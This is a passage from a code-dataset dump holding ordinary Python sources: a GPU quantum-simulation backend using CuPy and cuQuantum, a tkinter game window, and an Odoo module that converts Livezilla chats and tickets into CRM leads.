self.npsparse.issparse(x):\n return x.toarray()\n return np.array(x, copy=False)\n\n def issparse(self, x):\n return self.sparse.issparse(x) or self.npsparse.issparse(x)\n\n def zero_state(self, nqubits):\n n = 1 << nqubits\n kernel = self.gates.get(f\"initial_state_kernel_{self.kernel_type}\")\n state = self.cp.zeros(n, dtype=self.dtype)\n kernel((1,), (1,), [state])\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def zero_density_matrix(self, nqubits):\n n = 1 << nqubits\n kernel = self.gates.get(f\"initial_state_kernel_{self.kernel_type}\")\n state = self.cp.zeros(n * n, dtype=self.dtype)\n kernel((1,), (1,), [state])\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state.reshape((n, n))\n\n def identity_density_matrix(self, nqubits, normalize: bool = True):\n n = 1 << nqubits\n state = self.cp.eye(n, dtype=self.dtype)\n self.cp.cuda.stream.get_current_stream().synchronize()\n if normalize:\n state /= 2**nqubits\n return state.reshape((n, n))\n\n def plus_state(self, nqubits):\n state = self.cp.ones(2**nqubits, dtype=self.dtype)\n 
state /= self.cp.sqrt(2**nqubits)\n return state\n\n def plus_density_matrix(self, nqubits):\n state = self.cp.ones(2 * (2**nqubits,), dtype=self.dtype)\n state /= 2**nqubits\n return state\n\n def asmatrix_fused(self, gate):\n npmatrix = super().asmatrix_fused(gate)\n return self.cast(npmatrix, dtype=self.dtype)\n\n # def control_matrix(self, gate): Inherited from ``NumpyBackend``\n\n def calculate_blocks(self, nstates, block_size=DEFAULT_BLOCK_SIZE):\n \"\"\"Compute the number of blocks and of threads per block.\n\n The total number of threads is always equal to ``nstates``, give that\n the kernels are designed to execute only one out of ``nstates`` updates.\n Therefore, the number of threads per block (``block_size``) changes also\n the total number of blocks. By default, it is set to ``self.DEFAULT_BLOCK_SIZE``.\n \"\"\"\n # Compute the number of blocks so that at least ``nstates`` threads are launched\n nblocks = (nstates + block_size - 1) // block_size\n if nstates < block_size:\n nblocks = 1\n block_size = nstates\n return nblocks, block_size\n\n def one_qubit_base(self, state, nqubits, target, kernel, gate, qubits):\n ncontrols = len(qubits) - 1 if qubits is not None else 0\n m = nqubits - target - 1\n tk = 1 << m\n nstates = 1 << (nqubits - ncontrols - 1)\n if kernel in (\"apply_x\", \"apply_y\", \"apply_z\"):\n args = (state, tk, m)\n else:\n args = (state, tk, m, gate)\n\n if ncontrols:\n kernel = self.gates.get(f\"multicontrol_{kernel}_kernel_{self.kernel_type}\")\n args += (qubits, ncontrols + 1)\n else:\n kernel = self.gates.get(f\"{kernel}_kernel_{self.kernel_type}\")\n\n nblocks, block_size = self.calculate_blocks(nstates)\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def two_qubit_base(self, state, nqubits, target1, target2, kernel, gate, qubits):\n ncontrols = len(qubits) - 2 if qubits is not None else 0\n if target1 > target2:\n m1 = nqubits - target1 - 1\n m2 = nqubits - target2 - 1\n tk1, tk2 = 1 << m1, 1 << m2\n uk1, uk2 = tk2, tk1\n else:\n m1 = nqubits - target2 - 1\n m2 = nqubits - target1 - 1\n tk1, tk2 = 1 << m1, 1 << m2\n uk1, uk2 = tk1, tk2\n nstates = 1 << (nqubits - 2 - ncontrols)\n\n if kernel == \"apply_swap\":\n args = (state, tk1, tk2, m1, m2, uk1, uk2)\n else:\n args = (state, tk1, tk2, m1, m2, uk1, uk2, gate)\n assert state.dtype == args[-1].dtype\n\n if ncontrols:\n kernel = self.gates.get(f\"multicontrol_{kernel}_kernel_{self.kernel_type}\")\n args += (qubits, ncontrols + 2)\n else:\n kernel = self.gates.get(f\"{kernel}_kernel_{self.kernel_type}\")\n\n nblocks, block_size = self.calculate_blocks(nstates)\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def multi_qubit_base(self, state, nqubits, targets, gate, qubits):\n assert gate is not None\n if qubits is None:\n qubits = self.cast(\n sorted(nqubits - q - 1 for q in targets), dtype=self.cp.int32\n )\n ntargets = len(targets)\n if ntargets > self.MAX_NUM_TARGETS:\n raise ValueError(\n f\"Number of target qubits must be <= {self.MAX_NUM_TARGETS}\"\n f\" but is {ntargets}.\"\n )\n nactive = len(qubits)\n targets = self.cp.asarray(\n tuple(1 << (nqubits - t - 1) for t in targets[::-1]), dtype=self.cp.int64\n )\n nstates = 1 << (nqubits - nactive)\n nsubstates = 1 << ntargets\n nblocks, block_size = self.calculate_blocks(nstates)\n kernel = self.gates.get(\n f\"apply_multi_qubit_gate_kernel_{self.kernel_type}_{ntargets}\"\n )\n args = (state, gate, qubits, targets, 
ntargets, nactive)\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def _create_qubits_tensor(self, gate, nqubits):\n qubits = super()._create_qubits_tensor(gate, nqubits)\n return self.cp.asarray(qubits, dtype=self.cp.int32)\n\n def _as_custom_matrix(self, gate):\n matrix = super()._as_custom_matrix(gate)\n return self.cp.asarray(matrix.ravel())\n\n # def apply_gate(self, gate, state, nqubits): Inherited from ``NumbaBackend``\n\n # def apply_gate_density_matrix(self, gate, state, nqubits, inverse=False): Inherited from ``NumbaBackend``\n\n # def _apply_ygate_density_matrix(self, gate, state, nqubits): Inherited from ``NumbaBackend``\n\n # def apply_channel(self, gate): Inherited from ``NumbaBackend``\n\n # def apply_channel_density_matrix(self, channel, state, nqubits): Inherited from ``NumbaBackend``\n\n def collapse_state(self, state, qubits, shot, nqubits, normalize=True):\n ntargets = len(qubits)\n nstates = 1 << (nqubits - ntargets)\n nblocks, block_size = self.calculate_blocks(nstates)\n\n state = self.cast(state)\n qubits = self.cast(\n [nqubits - q - 1 for q in reversed(qubits)], dtype=self.cp.int32\n )\n args = [state, qubits, int(shot), ntargets]\n kernel = self.gates.get(f\"collapse_state_kernel_{self.kernel_type}\")\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n\n if normalize:\n norm = self.cp.sqrt(self.cp.sum(self.cp.square(self.cp.abs(state))))\n state = state / norm\n return state\n\n # def collapse_density_matrix(self, state, qubits, shot, nqubits, normalize=True): Inherited from ``NumbaBackend``\n\n # def reset_error_density_matrix(self, gate, state, nqubits): Inherited from ``NumpyBackend``\n\n def execute_distributed_circuit(\n self, circuit, initial_state=None, nshots=None, return_array=False\n ):\n import joblib\n from qibo.gates import M\n from qibo.states import CircuitResult\n\n if not circuit.queues.queues:\n circuit.queues.set(circuit.queue)\n\n try:\n cpu_backend = NumbaBackend()\n cpu_backend.set_precision(self.precision)\n ops = MultiGpuOps(self, cpu_backend, circuit)\n\n if initial_state is None:\n # Generate pieces for |000...0> state\n pieces = [cpu_backend.zero_state(circuit.nlocal)]\n pieces.extend(\n np.zeros(2**circuit.nlocal, dtype=self.dtype)\n for _ in range(circuit.ndevices - 1)\n )\n elif isinstance(initial_state, CircuitResult):\n # TODO: Implement this\n if isinstance(initial_state.execution_result, list):\n pieces = initial_state.execution_result\n else:\n pieces = ops.to_pieces(initial_state.state())\n elif isinstance(initial_state, self.tensor_types):\n pieces = ops.to_pieces(initial_state)\n else:\n raise_error(\n TypeError,\n \"Initial state type {} is not supported by \"\n \"distributed circuits.\".format(type(initial_state)),\n )\n for gate in circuit.queue:\n if isinstance(gate, M):\n gate.result.backend = CupyBackend()\n special_gates = iter(circuit.queues.special_queue)\n for i, queues in enumerate(circuit.queues.queues):\n if queues: # standard gate\n config = circuit.queues.device_to_ids.items()\n pool = joblib.Parallel(n_jobs=circuit.ndevices, prefer=\"threads\")\n pool(\n joblib.delayed(ops.apply_gates)(pieces, queues, ids, device)\n for device, ids in config\n )\n\n else: # special gate\n gate = next(special_gates)\n if isinstance(gate, tuple): # SWAP global-local qubit\n global_qubit, local_qubit = gate\n pieces = ops.swap(pieces, global_qubit, local_qubit)\n else:\n pieces = ops.apply_special_gate(pieces, 
gate)\n\n for gate in special_gates: # pragma: no cover\n pieces = ops.apply_special_gate(pieces, gate)\n\n if return_array:\n return ops.to_tensor(pieces)\n else:\n circuit._final_state = CircuitResult(self, circuit, pieces, nshots)\n return circuit._final_state\n\n except self.oom_error:\n raise_error(\n RuntimeError,\n \"State does not fit in memory during distributed \"\n \"execution. Please create a new circuit with \"\n \"different device configuration and try again.\",\n )\n\n def circuit_result_tensor(self, result):\n if isinstance(result.execution_result, list):\n # transform distributed state pieces to tensor\n ops = MultiGpuOps(self, NumbaBackend(), result.circuit)\n return ops.to_tensor(result.execution_result)\n else:\n return super().circuit_result_tensor(result)\n\n # def calculate_symbolic(self, state, nqubits, decimals=5, cutoff=1e-10, max_terms=20): Inherited from ``NumpyBackend``\n\n # def calculate_symbolic_density_matrix(self, state, nqubits, decimals=5, cutoff=1e-10, max_terms=20): Inherited from ``NumpyBackend``\n\n def calculate_probabilities(self, state, qubits, nqubits):\n try:\n probs = super().calculate_probabilities(state, qubits, nqubits)\n except MemoryError:\n # fall back to CPU\n probs = super().calculate_probabilities(\n self.to_numpy(state), qubits, nqubits\n )\n return probs\n\n def sample_shots(self, probabilities, nshots):\n # Sample shots on CPU\n probabilities = self.to_numpy(probabilities)\n return super().sample_shots(probabilities, nshots)\n\n # def aggregate_shots(self, shots): Inherited from ``NumpyBackend``\n\n # def samples_to_binary(self, samples, nqubits): Inherited from ``NumpyBackend``\n\n # def samples_to_decimal(self, samples, nqubits): Inherited from ``NumpyBackend``\n\n def sample_frequencies(self, probabilities, nshots):\n # Sample frequencies on CPU\n probabilities = self.to_numpy(probabilities)\n return super().sample_frequencies(probabilities, nshots)\n\n # def calculate_frequencies(self, samples): Inherited from ``NumpyBackend``\n\n # def assert_allclose(self, value, target, rtol=1e-7, atol=0.0): Inherited from ``NumpyBackend``\n\n def calculate_expectation_state(self, matrix, state, normalize):\n state = self.cast(state)\n statec = self.cp.conj(state)\n hstate = matrix @ state\n ev = self.cp.real(self.cp.sum(statec * hstate))\n if normalize:\n norm = self.cp.sum(self.cp.square(self.cp.abs(state)))\n ev = ev / norm\n return ev\n\n def calculate_expectation_density_matrix(self, matrix, state, normalize):\n state = self.cast(state)\n ev = self.cp.real(self.cp.trace(matrix @ state))\n if normalize:\n norm = self.cp.real(self.cp.trace(state))\n ev = ev / norm\n return ev\n\n def calculate_eigenvalues(self, matrix, k=6):\n if self.issparse(matrix):\n log.warning(\n \"Calculating sparse matrix eigenvectors because \"\n \"sparse modules do not provide ``eigvals`` method.\"\n )\n return self.calculate_eigenvectors(matrix, k=k)[0]\n return self.cp.linalg.eigvalsh(matrix)\n\n def calculate_eigenvectors(self, matrix, k=6):\n if self.issparse(matrix):\n if k < matrix.shape[0]:\n # Fallback to numpy because cupy's ``sparse.eigh`` does not support 'SA'\n from scipy.sparse.linalg import eigsh # pylint: disable=import-error\n\n result = eigsh(matrix.get(), k=k, which=\"SA\")\n return self.cast(result[0]), self.cast(result[1])\n matrix = matrix.toarray()\n if self.is_hip:\n # Fallback to numpy because eigh is not implemented in rocblas\n result = self.np.linalg.eigh(self.to_numpy(matrix))\n return self.cast(result[0]), self.cast(result[1])\n 
else:\n return self.cp.linalg.eigh(matrix)\n\n def calculate_matrix_exp(self, a, matrix, eigenvectors=None, eigenvalues=None):\n if eigenvectors is None or self.issparse(matrix):\n if self.issparse(matrix):\n from scipy.sparse.linalg import expm\n else:\n from scipy.linalg import expm\n return self.cast(expm(-1j * a * matrix.get()))\n else:\n expd = self.cp.diag(self.cp.exp(-1j * a * eigenvalues))\n ud = self.cp.transpose(self.cp.conj(eigenvectors))\n return self.cp.matmul(eigenvectors, self.cp.matmul(expd, ud))\n\n\nclass CuQuantumBackend(CupyBackend): # pragma: no cover\n # CI does not test for GPU\n\n def __init__(self):\n super().__init__()\n import cuquantum # pylint: disable=import-error\n from cuquantum import custatevec as cusv # pylint: disable=import-error\n\n self.cuquantum = cuquantum\n self.cusv = cusv\n self.platform = \"cuquantum\"\n self.versions[\"cuquantum\"] = self.cuquantum.__version__\n self.supports_multigpu = True\n self.handle = self.cusv.create()\n self.custom_matrices = CuQuantumMatrices(self.dtype)\n\n def __del__(self):\n if hasattr(self, \"cusv\"):\n self.cusv.destroy(self.handle)\n\n def set_precision(self, precision):\n if precision != self.precision:\n super().set_precision(precision)\n if self.custom_matrices:\n self.custom_matrices = CuQuantumMatrices(self.dtype)\n\n def get_cuda_type(self, dtype=\"complex64\"):\n if dtype == \"complex128\":\n return (\n self.cuquantum.cudaDataType.CUDA_C_64F,\n self.cuquantum.ComputeType.COMPUTE_64F,\n )\n elif dtype == \"complex64\":\n return (\n self.cuquantum.cudaDataType.CUDA_C_32F,\n self.cuquantum.ComputeType.COMPUTE_32F,\n )\n else:\n raise TypeError(\"Type can be either complex64 or complex128\")\n\n def one_qubit_base(self, state, nqubits, target, kernel, gate, qubits=None):\n ntarget = 1\n target = nqubits - target - 1\n if qubits is not None:\n qubits = self.to_numpy(qubits)\n ncontrols = len(qubits) - 1\n controls = self.np.asarray(\n [i for i in qubits if i != target], dtype=\"int32\"\n )\n else:\n ncontrols = 0\n controls = self.np.empty(0)\n adjoint = 0\n target = self.np.asarray([target], dtype=self.np.int32)\n\n state = self.cast(state)\n gate = self.cast(gate)\n assert state.dtype == gate.dtype\n data_type, compute_type = self.get_cuda_type(state.dtype)\n if isinstance(gate, self.cp.ndarray):\n gate_ptr = gate.data.ptr\n elif isinstance(gate, self.np.ndarray):\n gate_ptr = gate.ctypes.data\n else:\n raise ValueError\n\n workspaceSize = self.cusv.apply_matrix_get_workspace_size(\n self.handle,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n ntarget,\n ncontrols,\n compute_type,\n )\n\n # check the size of external workspace\n if workspaceSize > 0:\n workspace = self.cp.cuda.memory.alloc(workspaceSize)\n workspace_ptr = workspace.ptr\n else:\n workspace_ptr = 0\n\n self.cusv.apply_matrix(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n target.ctypes.data,\n ntarget,\n controls.ctypes.data,\n 0,\n ncontrols,\n compute_type,\n workspace_ptr,\n workspaceSize,\n )\n\n return state\n\n def two_qubit_base(\n self, state, nqubits, target1, target2, kernel, gate, qubits=None\n ):\n ntarget = 2\n target1 = nqubits - target1 - 1\n target2 = nqubits - target2 - 1\n target = self.np.asarray([target2, target1], dtype=self.np.int32)\n if qubits is not None:\n ncontrols = len(qubits) - 2\n qubits = self.to_numpy(qubits)\n controls = self.np.asarray(\n [i for i in qubits if i not in [target1, target2]], 
dtype=self.np.int32\n )\n else:\n ncontrols = 0\n controls = self.np.empty(0)\n\n adjoint = 0\n\n state = self.cast(state)\n gate = self.cast(gate)\n\n assert state.dtype == gate.dtype\n data_type, compute_type = self.get_cuda_type(state.dtype)\n\n if kernel == \"apply_swap\":\n nBitSwaps = 1\n bitSwaps = [(target1, target2)]\n maskLen = ncontrols\n maskBitString = self.np.ones(ncontrols)\n maskOrdering = controls\n\n self.cusv.swap_index_bits(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n bitSwaps,\n nBitSwaps,\n maskBitString,\n maskOrdering,\n maskLen,\n )\n return state\n\n if isinstance(gate, self.cp.ndarray):\n gate_ptr = gate.data.ptr\n elif isinstance(gate, self.np.ndarray):\n gate_ptr = gate.ctypes.data\n else:\n raise ValueError\n\n workspaceSize = self.cusv.apply_matrix_get_workspace_size(\n self.handle,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n ntarget,\n ncontrols,\n compute_type,\n )\n\n # check the size of external workspace\n if workspaceSize > 0:\n workspace = self.cp.cuda.memory.alloc(workspaceSize)\n workspace_ptr = workspace.ptr\n else:\n workspace_ptr = 0\n\n self.cusv.apply_matrix(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n target.ctypes.data,\n ntarget,\n controls.ctypes.data,\n 0,\n ncontrols,\n compute_type,\n workspace_ptr,\n workspaceSize,\n )\n\n return state\n\n def multi_qubit_base(self, state, nqubits, targets, gate, qubits=None):\n state = self.cast(state)\n ntarget = len(targets)\n if qubits is None:\n qubits = sorted(nqubits - q - 1 for q in targets)\n else:\n qubits = self.to_numpy(qubits)\n target = [nqubits - q - 1 for q in targets]\n target = self.np.asarray(target[::-1], dtype=self.np.int32)\n controls = self.np.asarray(\n [i for i in qubits if i not in target], dtype=self.np.int32\n )\n ncontrols = len(controls)\n adjoint = 0\n gate = self.cast(gate)\n assert state.dtype == gate.dtype\n data_type, compute_type = self.get_cuda_type(state.dtype)\n\n if isinstance(gate, self.cp.ndarray):\n gate_ptr = gate.data.ptr\n elif isinstance(gate, self.np.ndarray):\n gate_ptr = gate.ctypes.data\n else:\n raise ValueError\n\n workspaceSize = self.cusv.apply_matrix_get_workspace_size(\n self.handle,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n ntarget,\n ncontrols,\n compute_type,\n )\n\n # check the size of external workspace\n if workspaceSize > 0:\n workspace = self.cp.cuda.memory.alloc(workspaceSize)\n workspace_ptr = workspace.ptr\n else:\n workspace_ptr = 0\n\n self.cusv.apply_matrix(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n target.ctypes.data,\n ntarget,\n controls.ctypes.data,\n 0,\n ncontrols,\n compute_type,\n workspace_ptr,\n workspaceSize,\n )\n\n return state\n\n def collapse_state(self, state, qubits, shot, nqubits, normalize=True):\n state = self.cast(state)\n results = bin(int(shot)).replace(\"0b\", \"\")\n results = list(map(int, \"0\" * (len(qubits) - len(results)) + results))[::-1]\n ntarget = 1\n qubits = self.np.asarray(\n [nqubits - q - 1 for q in reversed(qubits)], dtype=\"int32\"\n )\n data_type, compute_type = self.get_cuda_type(state.dtype)\n\n for i in range(len(results)):\n self.cusv.collapse_on_z_basis(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n results[i],\n [qubits[i]],\n ntarget,\n 1,\n )\n\n if normalize:\n norm = 
self.cp.sqrt(self.cp.sum(self.cp.square(self.cp.abs(state))))\n state = state / norm\n\n return state\n\n\nclass MultiGpuOps: # pragma: no cover\n # CI does not have GPUs\n\n def __init__(self, backend, cpu_backend, circuit):\n self.backend = backend\n self.circuit = circuit\n self.cpu_ops = cpu_backend.ops\n\n def transpose_state(self, pieces, state, nqubits, order):\n original_shape = state.shape\n state = state.ravel()\n # always fall back to numba CPU backend because for ops not implemented on GPU\n state = self.cpu_ops.transpose_state(tuple(pieces), state, nqubits, order)\n return np.reshape(state, original_shape)\n\n def to_pieces(self, state):\n nqubits = self.circuit.nqubits\n qubits = self.circuit.queues.qubits\n shape = (self.circuit.ndevices, 2**self.circuit.nlocal)\n state = np.reshape(self.backend.to_numpy(state), shape)\n pieces = [state[i] for i in range(self.circuit.ndevices)]\n new_tensor = np.zeros(shape, dtype=state.dtype)\n new_tensor = self.transpose_state(\n pieces, new_tensor, nqubits, qubits.transpose_order\n )\n for i in range(self.circuit.ndevices):\n pieces[i] = new_tensor[i]\n return pieces\n\n def to_tensor(self, pieces):\n nqubits = self.circuit.nqubits\n qubits = self.circuit.queues.qubits\n if qubits.list == list(range(self.circuit.nglobal)):\n tensor = np.concatenate([x[np.newaxis] for x in pieces], axis=0)\n tensor = np.reshape(tensor, (2**nqubits,))\n elif qubits.list == list(range(self.circuit.nlocal, self.circuit.nqubits)):\n tensor = np.concatenate([x[:, np.newaxis] for x in pieces], axis=1)\n tensor = np.reshape(tensor, (2**nqubits,))\n else: # fall back to the transpose op\n tensor = np.zeros(2**nqubits, dtype=self.backend.dtype)\n tensor = self.transpose_state(\n pieces, tensor, nqubits, qubits.reverse_transpose_order\n )\n return tensor\n\n def apply_gates(self, pieces, queues, ids, device):\n \"\"\"Method that is parallelized using ``joblib``.\"\"\"\n for i in ids:\n device_id = int(device.split(\":\")[-1]) % self.backend.ngpus\n with self.backend.cp.cuda.Device(device_id):\n piece = self.backend.cast(pieces[i])\n for gate in queues[i]:\n piece = self.backend.apply_gate(gate, piece, self.circuit.nlocal)\n pieces[i] = self.backend.to_numpy(piece)\n del piece\n\n def apply_special_gate(self, pieces, gate):\n \"\"\"Executes special gates on CPU.\n\n Currently special gates are ``Flatten`` or ``CallbackGate``.\n This method calculates the full state vector because special gates\n are not implemented for state pieces.\n \"\"\"\n from qibo.gates import CallbackGate\n\n # Reverse all global SWAPs that happened so far\n pieces = self.revert_swaps(pieces, reversed(gate.swap_reset))\n state = self.to_tensor(pieces)\n if isinstance(gate, CallbackGate):\n gate.apply(self.backend, state, self.circuit.nqubits)\n else:\n state = gate.apply(self.backend, state, self.circuit.nqubits)\n pieces = self.to_pieces(state)\n # Redo all global SWAPs that happened so far\n pieces = self.revert_swaps(pieces, gate.swap_reset)\n return pieces\n\n def swap(self, pieces, global_qubit, local_qubit):\n m = self.circuit.queues.qubits.reduced_global.get(global_qubit)\n m = self.circuit.nglobal - m - 1\n t = 1 << m\n for g in range(self.circuit.ndevices // 2):\n i = ((g >> m) << (m + 1)) + (g & (t - 1))\n local_eff = self.circuit.queues.qubits.reduced_local.get(local_qubit)\n self.cpu_ops.swap_pieces(\n pieces[i], pieces[i + t], local_eff, self.circuit.nlocal\n )\n return pieces\n\n def revert_swaps(self, pieces, swap_pairs):\n for q1, q2 in swap_pairs:\n if q1 not in 
self.circuit.queues.qubits.set:\n                q1, q2 = q2, q1\n            pieces = self.swap(pieces, q1, q2)\n        return pieces\n","sub_path":"src/qibojit/backends/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":32314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"413245795","text":"from tkinter import *\nimport tkinter\n# import scene.scene_game as game_scene\nimport scene.scene_init as init_scene\nimport globe\nimport time\n\n\nclass MainWindow:\n    \"\"\"\n    SUMMARY:\n        The main game window, for carrying all different scenes\n\n    Attributes:\n        self.window                 Define tkinter window object\n        self.window.title           Set the title of the window\n        self.activescene            Initialize the scene which is updated & displayed inside the window\n        self.stack                  Initialize the scene stack for rapid scene switching\n    \"\"\"\n\n    def __init__(self):\n        self.window = tkinter.Tk()\n        self.window.title(\n            \"東方靈異伝 ~ Highly Responsive to Prayers [FanMade Version]\")\n        self.window.resizable(0, 0)\n        self.window.iconphoto(True, PhotoImage(file=\"asset/icon.gif\"))\n        self.window.configure(background='black')\n\n        self.activescene = None\n        self.stack = []\n\n    def coldstart(self, scene):\n        \"\"\"\n        DESCRIPTION:\n            start one specific scene inside the window for the first time\n\n        Args:\n            scene: The scene to be started\n\n        Return:\n            None\n        \"\"\"\n        self.stack.append(scene)\n        self.activescene = scene\n        self.activescene.extpause(1)\n\n    def switch(self, scene, arg=None, arg1=None):\n        \"\"\"\n        DESCRIPTION:\n            switch from one scene to another. WARNING: Will kill the old one,\n            save all relevant states before switching\n\n        Args:\n            scene: The destination scene to be switched to\n            arg: conditional data passing\n            arg1: conditional data passing\n        \"\"\"\n        self.activescene.extpause(0)  # Pause the current scene\n        self.stack.append(scene)  # Append destination scene into the stack\n        # Remove all objects on the canvas, do NOT preserve states\n        self.activescene.canvas.destroy()\n\n        # Set activescene to destination scene\n        self.activescene = scene.Scene(self.window, arg, arg1)\n        time.sleep(0.1)\n        self.activescene.extpause(1)\n\n    def run(self):\n        \"\"\"\n        DESCRIPTION:\n            run the main window framework\n\n        Args:\n            /\n        \"\"\"\n        self.coldstart(init_scene.Scene(self.window, None))  # coldstart init scene\n\n        while True:  # go into while loop for scene updates\n            self.activescene.update()\n\n    @staticmethod\n    def kill():\n        \"\"\"\n        DESCRIPTION:\n            kill the program\n\n        Args:\n            /\n        \"\"\"\n        globe.window.window.destroy()\n\n\nglobe.ispause = False\n# Instantiate MainWindow class, set & initialize window\nglobe.window = MainWindow()\nglobe.window.run()  # Call function run(), start running init_scene\nglobe.window.window.mainloop()  # tkinter mainloop\n","sub_path":"Game-1280*720(no line length limit)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87776201","text":"# -*- coding: utf-8 -*-\nimport logging\nimport hashlib\nimport datetime\nimport time\nimport requests\nimport pytz\nfrom openerp import models, api\nfrom .settings import LIVEZILLA_TICKET_PARAM_KEY, LIVEZILLA_CHAT_PARAM_KEY, LIVEZILLA_API_URL_PARAM_KEY, LIVEZILLA_API_USERNAME_PARAM_KEY, LIVEZILLA_API_PASSWORD_PARAM_KEY, LIVEZILLA_TIMEZONE_PARAM_KEY\nfrom ..lib import livezilla\n\n__author__ = 'Rui Coelho'\n_logger = logging.getLogger(__name__)\ntz = 'Europe/Lisbon'\n\n_LEAD_ORIGIN_CHAT_REF = 
'pdf_crm_extensions.product_origin_chat'\n_LEAD_ORIGIN_TICKET_REF = 'pdf_crm_extensions.product_origin_ticket'\nLEAD_NAME_STR_FORMAT = u'Chat #{0} | {1}'\nTICKET_NAME_STR_FORMAT = u'Ticket #{0} | {1}'\n\n\nclass pdf_external_leads_livezilla(models.TransientModel):\n \"\"\"\n Livezilla\n \"\"\"\n _name = 'pdf_external_leads.livezilla'\n _inherit = ['automatic.leads.mixin']\n\n def _get_livezilla_connector(self):\n url = self.env['ir.config_parameter'].get_param(LIVEZILLA_API_URL_PARAM_KEY)\n username = self.env['ir.config_parameter'].get_param(LIVEZILLA_API_USERNAME_PARAM_KEY)\n password = self.env['ir.config_parameter'].get_param(LIVEZILLA_API_PASSWORD_PARAM_KEY)\n timezone = self.env['ir.config_parameter'].get_param(LIVEZILLA_TIMEZONE_PARAM_KEY)\n connector = livezilla.Connector(requests, url, username, password, timezone)\n return connector\n\n @staticmethod\n def extract_leads_from_tickets(tickets):\n \"\"\"\n Extract info from list of chats to be converted into odoo leads\n :param tickets: list of tickets\n :type tickets: list\n :returns: list of information for leads\n :rtype: list\n \"\"\"\n _logger.info('Extracting info from % i tickets to create leads', len(tickets))\n result = []\n leads_index = []\n for item in tickets: # type: dict\n ticket = item['Ticket']\n ticket_message = ticket['Messages'][0]['TicketMessage']\n\n similarity_key = u'{0}|{1}|{2}|{3}'.format(ticket_message['Fullname'], ticket_message['Phone'], ticket_message['Email'], ticket['Group'])\n digest = hashlib.md5(similarity_key.encode('ascii', 'backslashreplace')).hexdigest()\n if digest not in leads_index:\n leads_index.append(digest)\n real_estate_reference = None\n if 'Customs' in ticket_message and 'Imovel' in ticket_message['Customs']:\n real_estate_reference = ticket_message['Customs']['Imovel']\n\n result.append({'name': TICKET_NAME_STR_FORMAT.format(unicode(ticket_message['TicketId']), unicode(ticket_message['Fullname'])),\n 'description': unicode(ticket_message['Subject'] + '\\n' + ticket_message['Text']),\n 'contact_name': unicode(ticket_message['Fullname']),\n 'contact_phone': unicode(ticket_message['Phone']),\n 'contact_email': unicode(ticket_message['Email']),\n 'group': unicode(ticket['Group']),\n 'product_code': real_estate_reference})\n else:\n similar_ticket_index = leads_index.index(digest)\n result[similar_ticket_index]['description'] += '\\n' + 20 * '-' + '\\n' + unicode(ticket_message['Subject']) + '\\n' + unicode(ticket_message['Text'])\n\n return result\n\n @staticmethod\n def extract_leads_from_chats(chats):\n \"\"\"\n Extract info from list of chats to be converted into odoo leads\n :param chats: list of chats\n :type chats: list\n :returns: list of information for leads\n :rtype: list\n \"\"\"\n _logger.info('Extracting info from % i chats to create leads', len(chats))\n result = []\n leads_index = []\n for item in chats:\n chat = item['Chat']\n\n if 'Operator' not in chat:\n continue\n\n similarity_key = u'{0}|{1}|{2}|{3}'.format(chat['Fullname'], chat['Phone'], chat['Email'], chat['OperatorId'])\n digest = hashlib.md5(similarity_key.encode('ascii', 'backslashreplace')).hexdigest()\n if digest not in leads_index:\n leads_index.append(digest)\n real_estate_reference = None\n if 'Customs' in chat and 'Imovel' in chat['Customs']:\n real_estate_reference = chat['Customs']['Imovel']\n result.append({'name': LEAD_NAME_STR_FORMAT.format(unicode(chat['ChatId']), unicode(chat['Fullname'])), 'description': unicode(chat['Question']) + '\\n' + unicode(chat['PlainText']), 'operator': 
unicode(chat['Operator'].email), 'contact_name': unicode(chat['Fullname']), 'contact_phone': unicode(chat['Phone']), 'contact_email': unicode(chat['Email']), 'group': unicode(chat['Group']), 'product_code': real_estate_reference})\n else:\n similar_chat_index = leads_index.index(digest)\n result[similar_chat_index]['description'] += '\\n' + 20 * '-' + '\\n' + unicode(chat['Question']) + '\\n' + unicode(chat['PlainText'])\n\n return result\n\n @staticmethod\n def extract_contacts_from_tickets(tickets):\n \"\"\"\n Extract contact info from a list of tickets\n :param tickets: list of tickets\n :type tickets: list\n :returns: list of contact information\n :rtype: list\n \"\"\"\n _logger.info('Extracting contacts from %i tickets', len(tickets))\n result = []\n for ticket in tickets: # type: dict\n _logger.debug(ticket)\n ticket_message = ticket['Ticket']['Messages'][0]['TicketMessage'] # type: dict\n result.append({'name': unicode(ticket_message['Fullname']), 'phone': unicode(ticket_message['Phone']), 'email': unicode(ticket_message['Email']), 'lang': unicode(ticket['Ticket']['Language']), 'group': unicode(ticket['Ticket']['Group'])})\n\n return result\n\n @staticmethod\n def extract_contacts_from_chats(chats):\n \"\"\"\n Extract contact info from a list of chats\n :param chats: list of chats\n :type chats: list\n :returns: list of contact information\n :rtype: list\n \"\"\"\n _logger.info('Extracting contacts from %i chats', len(chats))\n result = []\n for item in chats: # type: dict\n _logger.debug(item)\n chat = item['Chat']\n result.append({'name': chat['Fullname'], 'phone': chat['Phone'], 'email': chat['Email'], 'lang': 